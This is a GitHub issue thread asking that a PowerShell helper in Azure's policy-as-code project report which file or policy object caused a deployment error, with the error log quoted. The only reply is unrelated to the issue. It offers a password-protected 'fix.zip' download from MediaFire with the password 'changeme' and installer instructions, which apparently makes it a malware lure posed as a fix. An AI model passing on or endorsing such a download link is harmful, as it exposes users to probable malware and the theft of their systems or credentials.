### ISSUE TITLE
`Set-AzPolicySetDefinitionRestMethod`: Say what file errored

### ISSUE THREAD

**Issue by o-l-a-v** [Azure/enterprise-azure-policy-as-code#735]
**Is your feature request related to a problem? Please describe.**

When [`Set-AzPolicySetDefinitionRestMethod`](https://github.com/Azure/enterprise-azure-policy-as-code/blob/main/Scripts/Helpers/RestMethods/Set-AzPolicySetDefinitionRestMethod.ps1) errors it does not say what file, or ID/name of policy object failed.

Example:

```pwsh
Write-Error: /home/runner/.local/share/powershell/Modules/EnterprisePolicyAsCode/10.5.6/functions/Deploy-PolicyPlan.ps1:162
Line |
 162 |              Set-AzPolicySetDefinitionRestMethod -Definition $entry -A …
     |              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | definition error 400 -- {   "error": {     "code":
     | "InvalidRequestContent",     "message": "The request content was invalid
     | and could not be deserialized: 'Could not find member 'allowed' on
     | object of type 'PolicyParameterDefinition'. Path
     | 'properties.parameters.effect.allowed', line 1, position 296.'."   } }
Error: Error: The process '/usr/bin/pwsh' failed with exit code 1
```

**Describe the solution you'd like**

Error should say what file caused the errored.

**Describe alternatives you've considered**

None yet.

**Additional context**

None.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
